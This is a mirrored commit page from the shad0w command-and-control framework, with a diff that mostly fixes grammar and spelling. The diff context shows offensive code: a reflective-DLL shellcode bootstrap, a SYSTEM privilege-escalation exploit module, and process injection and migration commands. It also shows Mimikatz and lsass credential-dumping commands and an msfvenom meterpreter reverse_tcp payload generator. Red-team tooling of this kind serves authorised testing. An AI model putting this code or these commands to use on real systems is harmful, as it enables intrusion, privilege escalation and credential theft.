Mirrors
/
shad0w
mirror of https://github.com/bats3c/shad0w
6
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Grammar

This commit is contained in:
Lee Baird 2021-01-15 10:15:42 -05:00
parent c9fb057ccc
commit 2e6194f6a5
56 changed files with 198 additions and 210 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
exploits/system_printspoofer/system_printspoofer.py
View File

@ -1,7 +1,3 @@
#
# Abuse the SeImpersonate token to elevate privilages to system
#
from lib import buildtools
__description__ = {
@ -11,7 +7,7 @@ __description__ = {
"Versions": "All",
"Arch": "x64",
"Secure": True,
"Details": "Abuse the SeImpersonate token to elevate privilages to system"
"Details": "Abuse the SeImpersonate token to elevate privilege to system"
}
def check_callback(shad0w, data):

40
lib/ShellcodeRDI.py
View File

@ -67,13 +67,13 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
bootstrap = b''
bootstrapSize = 64
# call next instruction (Pushes next instruction address to stack)
# call next instruction (pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
# pop rcx - Capture our current location in memory
# pop rcx - capture our current location in memory
bootstrap += b'\x59'
# mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
@ -83,17 +83,17 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
bootstrap += b'\x48\x81\xc1'
bootstrap += pack('I', dllOffset)
# mov edx, <Hash of function>
# mov edx, <hash of function>
bootstrap += b'\xba'
bootstrap += pack('I', functionHash)
# Setup the location of our user data
# add r8, <Offset of the DLL> + <Length of DLL>
# add r8, <offset of the DLL> + <length of DLL>
bootstrap += b'\x49\x81\xc0'
userDataLocation = dllOffset + len(dllBytes)
bootstrap += pack('I', userDataLocation)
# mov r9d, <Length of User Data>
# mov r9d, <length of User Data>
bootstrap += b'\x41\xb9'
bootstrap += pack('I', len(userData))
@ -103,27 +103,27 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
# mov rsi, rsp - store our current stack pointer for later
bootstrap += b'\x48\x89\xe6'
# and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
# and rsp, 0x0FFFFFFFFFFFFFFF0 - align the stack to 16 bytes
bootstrap += b'\x48\x83\xe4\xf0'
# sub rsp, 0x30 - Create some breathing room on the stack
# sub rsp, 0x30 - create some breathing room on the stack
bootstrap += b'\x48\x83\xec'
bootstrap += b'\x30' # 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
# mov dword ptr [rsp + 0x20], <flags> - push arg 5 just above shadow space
bootstrap += b'\xC7\x44\x24'
bootstrap += b'\x20'
bootstrap += pack('I', flags)
# call - Transfer execution to the RDI
# call - transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# mov rsp, rsi - Reset our original stack pointer
# mov rsp, rsi - reset our original stack pointer
bootstrap += b'\x48\x89\xf4'
# pop rsi - Put things back where we left them
# pop rsi - put things back where we left them
bootstrap += b'\x5e'
# ret - return to caller
@ -145,10 +145,10 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
bootstrap = b''
bootstrapSize = 46
# call next instruction (Pushes next instruction address to stack)
# call next instruction (pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
# set the offset to our DLL from pop result
dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
# pop eax - Capture our current location in memory
@ -163,20 +163,20 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
# mov ebx, eax - copy our location in memory to ebx before we start modifying eax
bootstrap += b'\x89\xc3'
# add eax, <Offset to the DLL>
# add eax, <offset to the DLL>
bootstrap += b'\x05'
bootstrap += pack('I', dllOffset)
# add ebx, <Offset to the DLL> + <Size of DLL>
# add ebx, <offset to the DLL> + <size of DLL>
bootstrap += b'\x81\xc3'
userDataLocation = dllOffset + len(dllBytes)
bootstrap += pack('I', userDataLocation)
# push <Flags>
# push <flags>
bootstrap += b'\x68'
bootstrap += pack('I', flags)
# push <Length of User Data>
# push <length of User Data>
bootstrap += b'\x68'
bootstrap += pack('I', len(userData))
@ -190,9 +190,9 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
# push eax
bootstrap += b'\x50'
# call - Transfer execution to the RDI
# call - transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# leave

2
lib/basecommand.py
View File

@ -32,7 +32,7 @@ class BaseCommand:
return
def parse(self):
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
self.args = self.parser.parse_args(self.args[1:])
except:

25
lib/buildtools.py
View File

@ -20,10 +20,9 @@ exploits, etc, staged payloads are recommended as they are much smaller and easi
"""
def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/beacon", asm=False, backmake=False):
# move the source files of the beacon over
# to the build directory
# move the source files of the beacon over to the build directory
# put us in the correct dir (this obviously needs to be inside docker)
# put us in the correct dir (this obviously needs to be inside Docker)
os.chdir(basedir)
# clean the build dir
@ -38,8 +37,7 @@ def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/be
return
def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
# update the settings so that when we build
# we will use our new args
# update the settings so that when we build, we will use our new args
# this is hardcoded so will need docker
if custom_path == None:
@ -79,7 +77,7 @@ def _gen_key(name):
def _crypt_strings():
# encrypt strings so they are not hanging around in the binary waiting to be
# thrown into a yara rule. This is obsfication not encryption
# thrown into a Yara rule. This is obfuscation not encryption
new_file = ""
@ -164,11 +162,10 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
return True
def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=False, donut=True, srdi=False):
# use donut or srdi to extract the shellcode from
# our newly created beacon
# use Donut or srdi to extract the shellcode from our newly created beacon
if donut and not srdi:
# use donut to get it
# use Donut to get it
if want_base64 is False:
code = shellcode.generate(beacon_file, None, None, parse=False)
@ -184,7 +181,7 @@ def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=
# null out the pe header
flags |= 0x1
# obfusicate the imports, with no delay
# obfuscate the imports, with no delay
flags = flags | 0x4 | 0 << 16
if want_base64 is False:
@ -241,7 +238,7 @@ def get_payload_variables(payload_string, warn=True):
except IndexError:
raise_issue_payload(payload_string)
# these two dont matter as much
# these two don't matter as much
try:
secure = payload[2]
static = payload[3]
@ -329,14 +326,14 @@ def shellcode_to_array(data):
line_len += 1
continue
# keep the correct sytax at the start
# keep the correct syntax at the start
if length == 0:
array += f"{hex(i)}, "
length += 1
line_len += 1
continue
# keep the correct synatx though out
# keep the correct syntax though out
elif length != 0:
array += f"{hex(i)}, "
length += 1
@ -368,7 +365,7 @@ def elevate_build_stage(shad0w, rootdir=None, os=None, arch=None, secure=None, f
update_settings_file(None, custom_template=settings_template)
# now we need to run 'make' inside the cloned dir
# shad0w.debug.spinner(f"Preparing exploit...")
# shad0w.debug.spinner(f"Preparing exploit.")
make_in_clone(arch=arch, platform=os, secure=secure, static=True)
# shad0w.debug.stop_spinner = True

2
lib/commands/beacons.py
View File

@ -8,7 +8,7 @@ __description__ = "Interact with or display current beacons"
__author__ = "@_batsec_"
def _list_beacons(shad0w):
# i have gcse english, i gonna use it
# I have gcse english, I gonna use it
if shad0w.beacon_count == 1:
shad0w.debug.log(f"{shad0w.beacon_count} active beacon\n", log=True)
else:

2
lib/commands/binject.py
View File

@ -140,7 +140,7 @@ binject -b x64/windows/secure -p 9207
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = BinjectCommand(args)

4
lib/commands/cat.py
View File

@ -60,13 +60,13 @@ cat C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# setup the args
parse.add_argument("file", nargs='*', help="file you want to display the contents of")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
# we need a file to read so if we don't then fail
if len(args.file) == 0:
print(error_list)
parse.print_help()

2
lib/commands/cd.py
View File

@ -75,7 +75,7 @@ cd "C:\\Documents and Settings"
# setup the args
parse.add_argument("dir", nargs='*', help="Location of the dir you want to change to")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

2
lib/commands/die.py
View File

@ -52,7 +52,7 @@ die -y
# set the args
parse.add_argument("-y", "--yes", action='store_true', help="Confirm the death of the beacon")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

4
lib/commands/dllinject.py
View File

@ -62,7 +62,7 @@ dllinject -p 4267 -f yourfile.dll
def run(self, shad0w):
rcode = get_file_data(self.args.file)
if rcode is None:
shad0w.debug.error(f"DLL '{self.args.file}' does not exist")
shad0w.debug.error(f"DLL '{self.args.file}' does not exist.")
return
inject_info = build_inject_info(self.args, rcode)
@ -73,7 +73,7 @@ dllinject -p 4267 -f yourfile.dll
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = DllinjectCommand(args)

4
lib/commands/dotnet.py
View File

@ -27,7 +27,7 @@ def format_data(shad0w, data):
def dotnet_callback(shad0w, data):
# well its kinda true
if "v" not in data:
shad0w.debug.error(".NET is not installed")
shad0w.debug.error(".NET is not installed.")
return ""
data = data.split("C:\\Windows\\Microsoft.NET\\Framework64\\")
@ -45,7 +45,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# clone all the source files

22
lib/commands/download.py
View File

@ -18,7 +18,7 @@ ERROR = False
error_list = ""
# name of the file to download
FILE_TO_DOWLOAD = ""
FILE_TO_DOWNLOAD = ""
# let argparse error and exit nice
def error(message):
@ -31,20 +31,20 @@ def exit(status=0, message=None):
return
def download_callback(shad0w, data):
global FILE_TO_DOWLOAD
global FILE_TO_DOWNLOAD
shad0w.beacons[shad0w.current_beacon]["callback"] = None
FILE_TO_DOWLOAD = ''.join(FILE_TO_DOWLOAD)
FILE_TO_DOWNLOAD = ''.join(FILE_TO_DOWNLOAD)
shad0w.debug.good(f"Downloading '{FILE_TO_DOWLOAD}' ({len(data)} bytes)")
shad0w.debug.good(f"Downloading '{FILE_TO_DOWNLOAD}' ({len(data)} bytes)")
# change to the dir of the folder mapped to the users current dir
os.chdir("/root/shad0w/.bridge")
# os.unlink(FILE_TO_DOWLOAD)
# os.unlink(FILE_TO_DOWNLOAD)
with open(FILE_TO_DOWLOAD, 'wb') as file:
with open(FILE_TO_DOWNLOAD, 'wb') as file:
file.write(base64.b64decode(data))
# change the dir to our root
@ -56,11 +56,11 @@ def download_callback(shad0w, data):
def main(shad0w, args):
global FILE_TO_DOWLOAD
global FILE_TO_DOWNLOAD
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -83,13 +83,13 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# setup the args
parse.add_argument("file", nargs='*', help="File you want to download")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
# we need a file to read so if we don't then fail
if len(args.file) == 0:
print(error_list)
parse.print_help()
@ -102,7 +102,7 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
os.chdir("/root/shad0w/.bridge")
# make this variable global so the call back can access it
FILE_TO_DOWLOAD = args.file
FILE_TO_DOWNLOAD = args.file
# change back to our dir
os.chdir(shad0w_cwd)

14
lib/commands/elevate.py
View File

@ -10,7 +10,7 @@ import threading
from prettytable import PrettyTable
__description__ = "Attempt to elevate the beacons privilages on the target"
__description__ = "Attempt to elevate the beacons privileges on the target"
__author__ = "@_batsec_"
ERROR = False
@ -31,7 +31,7 @@ def list_exploits(shad0w):
sys.path.append("/root/shad0w/exploits/")
all_exploits = importlib.import_module("__init__").__all__
shad0w.debug.log(f"{len(all_exploits)} avalible exploits:\n", log=True)
shad0w.debug.log(f"{len(all_exploits)} available exploits:\n", log=True)
t = PrettyTable(['Exploit', 'Description'])
for exploit in all_exploits:
@ -95,7 +95,7 @@ def main(shad0w, args):
# check we got a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -120,25 +120,25 @@ elevate --smart
parse.error = error
# setup the args
parse.add_argument("-l", "--list", required=False, action='store_true', help="List the exploits avalible for the current session")
parse.add_argument("-l", "--list", required=False, action='store_true', help="List the exploits available for the current session")
parse.add_argument("-d", "--details", required=False, help="Display the details of an exploit")
parse.add_argument("-c", "--check", required=False, help="Check if the exploit will work")
parse.add_argument("-u", "--use", required=False, help="Use the exploit to attempt to elevate the session")
parse.add_argument("-s", "--smart", required=False, action='store_true', help="Attempt to auto elevate by letting shad0w decide what exploits to use")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
# we need a file to read so if we don't then fail
if ERROR:
print(error_list)
parse.print_help()
return
# list the avalible exploits
# list the available exploits
if args.list:
RAN_COMMAND = True
list_exploits(shad0w)

2
lib/commands/execute.py
View File

@ -80,7 +80,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = ExecuteCommand(args)

3
lib/commands/exit.py
View File

@ -8,6 +8,5 @@ __description__ = "Exit shad0w C2"
__author__ = "@_batsec_"
def main(shad0w, args):
# Once we have logging we will probably want to make a more
# sophisticated exit routine
# Once we have logging we will probably want to make a more sophisticated exit routine
os.sys.exit(0)

2
lib/commands/getpid.py
View File

@ -18,7 +18,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# make the json

6
lib/commands/gitl.py
View File

@ -17,7 +17,7 @@ __author__ = "@_batsec_"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of rubeus binary
# location of Rubeus binary
RUBEUS_BIN = "/root/shad0w/bin/gitl.x64.exe"
# did the command error
@ -70,7 +70,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
@ -102,7 +102,7 @@ gitl --disable
parse.add_argument("-e", "--enable", action='store_true', help="Enable the hook (drop all events)")
parse.add_argument("-d", "--disable", action='store_true', help="Disable the hook (allow all events)")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

8
lib/commands/help.py
View File

@ -7,7 +7,7 @@ import importlib
from lib import cmd
from prettytable import PrettyTable
__description__ = "Show shad0ws help infomation"
__description__ = "Show shad0ws help information"
__author__ = "@_batsec_"
def usage(shad0w):
@ -19,7 +19,7 @@ def usage(shad0w):
num_of_modules = len(cmd.Shad0wLexer.commands)
shad0w.debug.log(f"{num_of_modules} avalible commands.", log=True)
shad0w.debug.log(f"{num_of_modules} available commands.", log=True)
shad0w.debug.log(f"To get more info on the usage of the command use the flags -h/--help on it.\n", log=True)
for num, command in enumerate(cmd.Shad0wLexer.commands):
@ -29,12 +29,12 @@ def usage(shad0w):
try:
description = mod.__description__
except:
description = "No description avalible"
description = "No description available."
try:
author = mod.__author__
except:
author = "No author avalible"
author = "No author available."
t.add_row([command, description, author])
if num != num_of_modules - 1:

4
lib/commands/hijack.py
View File

@ -62,7 +62,7 @@ hijack -p 4267 -f shellcode.bin
def run(self, shad0w):
rcode = get_file_data(self.args.file)
if rcode is None:
shad0w.debug.error(f"Shellcode file '{self.args.file}' does not exist")
shad0w.debug.error(f"Shellcode file '{self.args.file}' does not exist.")
return
inject_info = build_inject_info(self.args, rcode)
@ -73,7 +73,7 @@ hijack -p 4267 -f shellcode.bin
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = HijackCommand(args)

4
lib/commands/lockless.py
View File

@ -29,12 +29,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
lockless_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(lockless_args) != 0:

6
lib/commands/ls.py
View File

@ -52,7 +52,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -74,9 +74,9 @@ ls "C:\\Documents and Settings"
parse.error = error
# setup the args
parse.add_argument("dir", nargs='*', help="Location of the dir to want to list the contents of")
parse.add_argument("dir", nargs='*', help="Location of the dir you want to list the contents of")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

40
lib/commands/meterpreter.py
View File

@ -1,5 +1,5 @@
#
# metasploit handover module
# Metasploit handover module
#
from lib import buildtools, tools, shellcode
@ -15,7 +15,7 @@ class DummyClass(object):
def __init__(self):
pass
# let argparse error and exit nice
# Let argparse error and exit nice
def error(message):
#global ERROR, error_list
#ERROR = True
@ -29,18 +29,18 @@ def exit(status=0, message=None):
def msfvenom_payload_gen(shad0w, payload, lport, lhost, arch):
# Print some info
shad0w.debug.log(f"Metasploit is building the shellcode...", log=True)
shad0w.debug.log(f"Metasploit is building the shellcode.", log=True)
# put us in the correct dir (inside docker)
# Put us in the correct dir (inside Docker)
os.chdir("/root/shad0w/bin/metasploit")
#Generate the shellcode
# Generate the shellcode
os.system(f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f raw -a {arch} > {shad0w.current_beacon}.bin")
#Base64 encode
# Base64 encode
os.system(f"cat {shad0w.current_beacon}.bin | base64 -w 0 > {shad0w.current_beacon}.b64")
# Read and return the b64Shellcode
# Read and return the b64 shellcode
b64File = open(f'{shad0w.current_beacon}.b64',mode='r')
shellCodeB64 = b64File.read()
b64File.close()
@ -50,41 +50,41 @@ def msfvenom_payload_gen(shad0w, payload, lport, lhost, arch):
def main(shad0w, args):
# check we actually have a beacon
# Check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# init the parser
# Init the parser
parser = argparse.ArgumentParser(prog='meterpreter',formatter_class=argparse.RawDescriptionHelpFormatter, epilog="")
# keep it behaving nice
# Keep it behaving nice
parser.exit = exit
parser.error = error
# setup the args, set default='' to show help message when missing
parser.add_argument("--port", required=True, help="Port you would like metasploit to call")
parser.add_argument("--host", required=True, help="Host/IP you would like metasploit to call")
parser.add_argument("--payload", help="What metasploit payload you would like to deploy , default: windows/x64/meterpreter/reverse_tcp",required=False, default="windows/x64/meterpreter/reverse_tcp")
# Setup the args, set default='' to show help message when missing
parser.add_argument("--port", required=True, help="Port you would like Metasploit to call")
parser.add_argument("--host", required=True, help="Host/IP you would like Metasploit to call")
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp",required=False, default="windows/x64/meterpreter/reverse_tcp")
# make sure we dont die from weird args
# Make sure we don't die from weird args
try:
args = parser.parse_args(args[1:])
except:
pass
#If we are missing port or host (since the skip the above check)
# If we are missing port or host (since the skip the above check)
if not args.port or not args.host:
parser.print_help()
return
#Confirm that the payload used is x64 only
# Confirm that the payload used is x64 only
if "windows/x64/" not in args.payload:
error("Payload needs to be x64 specific!(eg: 'windows/x64/***') Try again!")
error("Payload needs to be x64 specific (eg: 'windows/x64/***'). Try again.")
return
# Generate and read the msfvenom shellcode
rcode = msfvenom_payload_gen(shad0w, payload = args.payload, lport = args.port, lhost = args.host, arch="x64")
# set a task for the current beacon to do
# Set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)

8
lib/commands/migrate.py
View File

@ -105,7 +105,7 @@ def generate_beacon_dll(shad0w, rcode):
# check that the dll has built
if made != True:
shad0w.debug.error("Error building migrate dll")
shad0w.debug.error("Error building migrate dll.")
return
# return the base64 dll data
@ -119,7 +119,7 @@ def await_impersonate(shad0w, pid):
imp_beacon_id = shad0w.beacons[shad0w.current_beacon]["impersonate"]
shad0w.beacons[shad0w.current_beacon]["task"] = (0x6000, None)
shad0w.debug.log("Tasked beacon to die", log=True)
shad0w.debug.log("Tasked beacon to die.", log=True)
shad0w.current_beacon = imp_beacon_id
break
@ -131,7 +131,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
@ -154,7 +154,7 @@ migrate -p 8725
# set the args
parse.add_argument("-p", "--pid", required=True, help="PID to migrate to")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

10
lib/commands/mimikatz.py
View File

@ -6,13 +6,13 @@ import argparse
from lib import shellcode
__description__ = "Execute mimikatz commands in memory on the target"
__description__ = "Execute Mimikatz commands in memory on the target"
__author__ = "@_batsec_, @gentilkiwi"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of mimikatz binary
# location of Mimikatz binary
MIMIKATZ_BIN = "/root/shad0w/bin/mimikatz.x64.exe"
# did the command error
@ -46,7 +46,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
@ -72,7 +72,7 @@ mimikatz -x sekurlsa::logonpasswords
parse.add_argument("-x", "--execute", nargs='+', required=True, help="Mimikatz command to execute")
parse.add_argument("-n", "--no-exit", action="store_true", required=False, help="Leave mimikatz running")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
@ -90,7 +90,7 @@ mimikatz -x sekurlsa::logonpasswords
if not args.no_exit:
params = params + " exit"
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args.param = args.execute
args.cls = False
args.method = False

4
lib/commands/mkdir.py
View File

@ -37,7 +37,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -58,7 +58,7 @@ mkdir "C:\\Users\\thejoker\\hello\\"
# setup the args
parse.add_argument("name", nargs='*', help="Name of the directory you want to create")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

2
lib/commands/ps.py
View File

@ -20,7 +20,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# make the json

6
lib/commands/psh.py
View File

@ -132,9 +132,9 @@ psh --info GetHash
parse.add_argument("-c", "--command", nargs="+", required=False, help="Powershell command to execute")
parse.add_argument("-m", "--module", required=False, help="Powershell modules to load")
parse.add_argument("-l", "--list", required=False, action='store_true', help="List all the available modules")
parse.add_argument("-i", "--info", required=False, help="Get infomation on a module")
parse.add_argument("-i", "--info", required=False, help="Get information on a module")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
@ -146,7 +146,7 @@ psh --info GetHash
parse.print_help()
return
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
donut_args = DummyClass()
psh_args = ""

2
lib/commands/pwd.py
View File

@ -18,7 +18,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# make the json

6
lib/commands/rm.py
View File

@ -1,6 +1,6 @@
#
#
# Delete something
#
#
import json
import argparse
@ -57,7 +57,7 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
# setup the args
parse.add_argument("name", nargs='*', help="Name of what you want to delete")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

4
lib/commands/rubeus.py
View File

@ -37,7 +37,7 @@ rubeus -x help
if self.args.execute:
params = ' '.join(self.args.execute)
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
self.args.param = self.args.execute
self.args.cls = False
self.args.method = False
@ -59,7 +59,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = RubeusCommand(args)

8
lib/commands/safetykatz.py
View File

@ -6,7 +6,7 @@ import argparse
from lib import shellcode
__description__ = "A tool to minidump lsass then use mimikatz sekurlsa::logonpasswords & sekurlsa::ekeys on it"
__description__ = "A tool to minidump lsass then use Mimikatz sekurlsa::logonpasswords & sekurlsa::ekeys on it"
__author__ = "@_batsec_, @harmj0y"
# identify the task as shellcode execute
@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of safetykatz binary
SAFETYKATZ_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SafetyKatz.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -29,12 +29,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
safetykatz_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(safetykatz_args) != 0:

6
lib/commands/seatbelt.py
View File

@ -111,7 +111,7 @@ def usage():
RPCMappedEndpoints - Current RPC endpoints mapped
+ SCCM - System Center Configuration Manager (SCCM) settings, if applicable
+ ScheduledTasks - Scheduled tasks (via WMI) that aren't authored by 'Microsoft', "-full" dumps all Scheduled tasks
SearchIndex - Query results from the Windows Search Index, default term of 'passsword'. (argument(s) == <search path> <pattern1,pattern2,...>
SearchIndex - Query results from the Windows Search Index, default term of 'password'. (argument(s) == <search path> <pattern1,pattern2,...>
SecurityPackages - Enumerates the security packages currently available using EnumerateSecurityPackagesA()
Services - Services with file info company names that don't contain 'Microsoft', "-full" dumps all processes
SlackDownloads - Parses any found 'slack-downloads' files
@ -209,12 +209,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
seatbelt_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(seatbelt_args) != 0:

2
lib/commands/set.py
View File

@ -44,7 +44,7 @@ set -v MsfStageSize -d 14
parse.add_argument("-v", "--variable", help="Variable name")
parse.add_argument("-d", "--data", help="Data to store in the variable")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:

6
lib/commands/sharpchrome.py
View File

@ -12,10 +12,10 @@ __author__ = "@_batsec_, @harmj0y"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of sharpchrome binary
# location of Sharpchrome binary
SHARPCHROME_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpChrome.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -37,7 +37,7 @@ def main(shad0w, args):
sharpchrome_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(sharpchrome_args) != 0:

6
lib/commands/sharpdpapi.py
View File

@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of sharpdpapi binary
SHARPDPAPI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDPAPI.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -32,12 +32,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
sharpdpapi_args = ' '.join(args[1:])
